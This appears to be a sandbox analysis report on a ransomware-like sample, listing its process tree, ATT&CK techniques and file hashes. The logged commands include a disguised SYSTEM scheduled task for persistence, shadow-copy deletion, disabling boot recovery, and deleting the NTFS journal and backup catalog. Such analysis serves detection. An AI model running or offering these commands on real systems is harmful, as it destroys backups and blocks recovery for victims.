  "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe" /F
  depth 2, PID: 1660

C:\Windows\system32\schtasks.exe
  SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe" /F
  depth 3
  - Creates scheduled task(s)
  PID: 1656
C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
  depth 2, PID: 588

C:\Windows\system32\vssadmin.exe
  vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
  depth 3
  - Enumerates connected drives
  - Interacts with shadow copies
  PID: 2740

C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
  depth 2, PID: 2812

C:\Windows\system32\vssadmin.exe
  vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
  depth 3
  - Enumerates connected drives
  - Interacts with shadow copies
  PID: 2480

C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
  depth 2, PID: 1652

C:\Windows\system32\vssadmin.exe
  vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
  depth 3
  - Interacts with shadow copies
  PID: 3056

C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
  depth 2, PID: 1764

C:\Windows\system32\vssadmin.exe
  vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
  depth 3
  - Interacts with shadow copies
  PID: 2664

C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
  depth 2, PID: 2188

C:\Windows\system32\vssadmin.exe
  vssadmin.exe Delete Shadows /all /quiet
  depth 3
  - Interacts with shadow copies
  PID: 2588
C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
  depth 2, PID: 856

C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} recoveryenabled No
  depth 3
  - Modifies boot configuration data using bcdedit
  PID: 712

C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
  depth 2, PID: 1860

C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
  depth 3
  - Modifies boot configuration data using bcdedit
  PID: 2316
C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
  depth 2, PID: 2292

C:\Windows\system32\fsutil.exe
  fsutil.exe usn deletejournal /D C:
  depth 3
  - Deletes NTFS Change Journal
  PID: 1616

C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
  depth 2, PID: 332

C:\Windows\system32\wbadmin.exe
  wbadmin.exe delete catalog -quiet
  depth 3
  - Deletes backup catalog
  PID: 596

C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
  depth 2, PID: 1788

C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
  depth 3, PID: 2912
C:\Windows\system32\vssvc.exe
  C:\Windows\system32\vssvc.exe
  depth 1
  - Suspicious use of AdjustPrivilegeToken
  PID: 2760

C:\Windows\system32\wbengine.exe
  "C:\Windows\system32\wbengine.exe"
  depth 1
  - Suspicious use of AdjustPrivilegeToken
  PID: 1048

C:\Windows\System32\vdsldr.exe
  C:\Windows\System32\vdsldr.exe -Embedding
  depth 1, PID: 2312

C:\Windows\System32\vds.exe
  C:\Windows\System32\vds.exe
  depth 1, PID: 2916
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Impair Defenses (2)
  - Disable or Modify Tools (2)
- Indicator Removal (3)
  - File Deletion (3)
- Modify Registry (4)
Downloads
-
Filesize 1KB
MD5 a5fafb1a377a6b6d6179f90bb74704f9
SHA1 20ead481826a4447d6744dc3911a951af6ce6fb9
SHA256 f45cc74c8a2c561707aa6506395aec08f97668040081acf0fa50fcf7bd6c21c8
SHA512 e3baa14a20944eaf062f4487da6459357fbc1c71604eadf0057bf4fe4b91ed841b168a39e9b6633ebe75d3a26ad8958f936929d3cbc553c3d33dcea7fee73d99
-
Filesize 684B
MD5 3b08ee91f8effa148f10983806de4fdc
SHA1 74e0156e304e4cdfa4bd9aa240824844e2c54cec
SHA256 029706908600a5679d075941c0ab5534f4eb4a2eadc81ad3edc7a7ffc37a3220
SHA512 21818839364c2351fa7dad4405fae044d92e3304a8d5d4b13790bde4f3426da5ea8a733a200c02774d1b1a88002103534ad5ec28dc18a53298ec4034ed4cf90d
-
Filesize 12KB
MD5 1f288cab0f94ca50e8b2b6c2d7c797eb
SHA1 3877e598d1b0d1948cd767ae1795dbc30ad154f6
SHA256 61ece0ac88c803be3b62d3a731a0bf2ff2b679203c91414ba1a24444cb6cd363
SHA512 cfb48f5e4216ecbe602ccf857459e5a266b74529f06b87f4758784dcfb6fdf389bd7db8f30066723c136bf0a42e43a3a5c227b905444600bac4ea19bb9d73940